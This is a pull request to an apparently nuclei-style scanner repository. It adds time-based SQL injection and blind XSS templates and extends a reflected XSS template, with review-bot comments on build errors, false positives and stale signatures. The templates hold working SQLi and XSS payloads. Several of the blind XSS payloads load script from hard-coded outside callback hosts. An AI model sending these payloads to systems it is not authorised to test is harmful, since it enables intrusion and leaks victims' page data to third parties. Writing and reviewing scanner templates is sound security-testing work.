Updated Reflected XSS, Added Blind XSS and Time based SQLi #9695

Open. Wants to merge 8 commits into base: main
36 changes: 36 additions & 0 deletions dast/vulnerabilities/sqli/time-based-sqli.yaml
@@ -0,0 +1,36 @@
id: time-based-sqli

info:
name: Time-Based Blind SQL Injection
author: 0xKayala
severity: critical
description: |
This Template detects time-based Blind SQL Injection vulnerability
tags: sqli,dast,time

http:
- method: GET
path:
- "{{BaseURL}}"

payloads:
injection:
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- "if(now()=sysdate(),SLEEP(7),0)"
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{injection}}"

stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "duration>=7 && duration <=16"
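Review bot: the matcher on the last line (`duration>=7 && duration <=16`) has no baseline, so any endpoint that normally takes seven seconds or more to answer, or a target slowed down by the scan itself, matches whether or not injection is possible; consider a control request on the same parameter (for example the same expression with `SLEEP(0)`) and deciding on the difference between the two timings, or at least tightening the window and stating the false-positive risk in `description`. Two smaller points: all six payloads depend on MySQL `SLEEP()` and `sysdate()`, so `tags: sqli,dast,time` and the description should say the check is MySQL-specific, and `This Template detects time-based Blind SQL Injection vulnerability` wants to read `This template detects a time-based blind SQL injection vulnerability`.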
64 changes: 64 additions & 0 deletions dast/vulnerabilities/xss/blind-xss.yaml
@@ -0,0 +1,64 @@
id: blind-xss

info:
name: Blind Cross Site Scripting
author: 0xKayala
severity: high
description: This template will spray blind XSS payloads into URLs. Use 'xss.report', 'bxsshunter.com', 'xsshunter.trufflesecurity.com', 'ez.pe' or 'self-hosted server' to check if the payload fired.
tags: xss,bxss,dast

variables:
first: "{{rand_int(10000, 99999)}}"
script_payload_1: "<script>$.getScript(\"//satya.bxss.in\")</script>"
script_payload_2: "</script><script%20/src=//0xkayala.github.io/xss-poc.js></script>\"><41707"
script_payload_3: "<script /src=//0xkayala.github.io/xss-poc.js></script>"
script_payload_4: "<script src=\"//0xkayala.github.io/xss-poc.js\"></script>"
script_payload_5: "</script><script src='https://satya.ez.pe'></script>"
script_payload_6: "<script src=//satya.ez.pe></script>"
script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e"
script_payload_8: "%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2F0xkayala.github.io/xss-poc.js%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E"
script_payload_9: "XX"></SCRIPT><embed src=//14.rs>"

Check failure on line 20 in dast/vulnerabilities/xss/blind-xss.yaml (GitHub Actions / build): 20:26 syntax error: expected chomping or indentation indicators, but found '<' (syntax)

http:
- method: GET
path:
- "{{BaseURL}}"

payloads:
blind:
- "{{script_payload_1}}"
- "{{script_payload_2}}"
- "{{script_payload_3}}"
- "{{script_payload_4}}"
- "{{script_payload_5}}"
- "{{script_payload_6}}"
- "{{script_payload_7}}"
- "{{script_payload_8}}"
- "{{script_payload_9}}"

fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{blind}}"

stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{script_payload_1}}"
- "{{script_payload_2}}"
- "{{script_payload_3}}"
- "{{script_payload_4}}"
- "{{script_payload_5}}"
- "{{script_payload_6}}"
- "{{script_payload_7}}"
- "{{script_payload_8}}"
- "{{script_payload_9}}"
- type: word
part: header
words:
- "text/html"
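Review bot: `script_payload_9: "XX"></SCRIPT><embed src=//14.rs>"` is what breaks the build: the unescaped `"` after `XX` closes the double-quoted scalar at column 26, which is exactly what the CI annotation on line 20 reports; escape it as `\"`, as `script_payload_7` and `script_payload_4` already do. The larger problem is that every callback host in the payloads (`satya.bxss.in`, `satya.ez.pe`, `0xkayala.github.io`, `14.rs`) is hard-coded to the author's own collectors, so anyone running this template ships their targets' blind-XSS hits to a third party; the callback should come from a variable the user sets or from nuclei's `{{interactsh-url}}`, which would also let the matcher look for an out-of-band interaction instead of searching `part: body` for the payload string. As written, a blind XSS by definition does not show up in the response, so the `matchers-condition: and` block with its body word matcher can only fire on ordinary reflection and duplicates `reflected-xss`. Also, `first: "{{rand_int(10000, 99999)}}"` is declared under `variables` but never referenced.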
16 changes: 13 additions & 3 deletions dast/vulnerabilities/xss/reflected-xss.yaml
@@ -1,8 +1,8 @@
id: reflected-xss

info:
name: Reflected Cross Site Scripting
author: pdteam
name: Reflected Cross-Site Scripting
author: pdteam,0xKayala
severity: medium
tags: xss,rxss,dast

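Review bot: the change on the `name:` line to `Reflected Cross-Site Scripting` is cosmetic, and the new `blind-xss.yaml` in this same PR uses the unhyphenated `Blind Cross Site Scripting`; either use one spelling in both templates or drop the rename so this hunk is limited to the author credit.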
@@ -18,6 +18,16 @@ http:
payloads:
reflection:
- "'\"><{{first}}"
- "<img src=x onerror=alert({{first}})>"
- "<script>alert({{first}})</script>"
- "'><ScRiPt>alert({{first}})</sCrIpT>"
- "</script><ScRiPt>alert({{first}})</sCrIpT>"
- "</script><script>alert({{first}})</script>"
- "<body onload=alert({{first}})>"
- "<marquee><img src=x onerror=confirm({{first}})></marquee>"
- "'><img%20src=xxx:x%20\x20onerror=javascript:alert({{first}})>"
- "'\"><img%20s+src+c=x%20on+onerror+%20=alert({{first}})>"
- "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o"

fuzzing:
- part: query
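Review bot: assuming the unchanged matcher block (only its `text/html` tail is visible in the last hunk) still looks for the literal reflected payload in the body, as the original single-canary design does, the three URL-encoded payloads (`'><img%20src=xxx:x%20\x20onerror=...`, `'\"><img%20s+src+c=x%20on+onerror+%20=...` and `'%3e%3cscript%3e...`) can never match: the server decodes `%20` and `%3e` before echoing them, so the reflected text is not equal to the payload unless the application echoes the raw query string. The `\x20` in the first of those is a YAML escape for a plain space placed right after a `%20`, which looks unintended. Beyond that, the existing canary `'\"><{{first}}` already establishes that `'`, `"`, `<` and `>` reflect unencoded, which is all a reflection-only matcher can establish; the ten `alert(...)`/`confirm(...)` variants add no detection capability but multiply the requests per parameter by eleven on a DAST scan. Suggest keeping the canary plus at most one or two event-handler variants for filters that strip `<script>`, and dropping the encoded ones.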
@@ -38,4 +48,4 @@ http:
part: header
words:
- "text/html"
# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950
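Review bot: the `# digest:` line is removed and added back byte-for-byte identical, so this hunk is most likely a trailing-newline change rather than a content change; more importantly, that digest is the template's signature over the file contents, and since the payload block changed in the previous hunk the old value no longer corresponds to the template. Drop the digest line from the PR and let it be regenerated when the template is signed, rather than carrying a stale one.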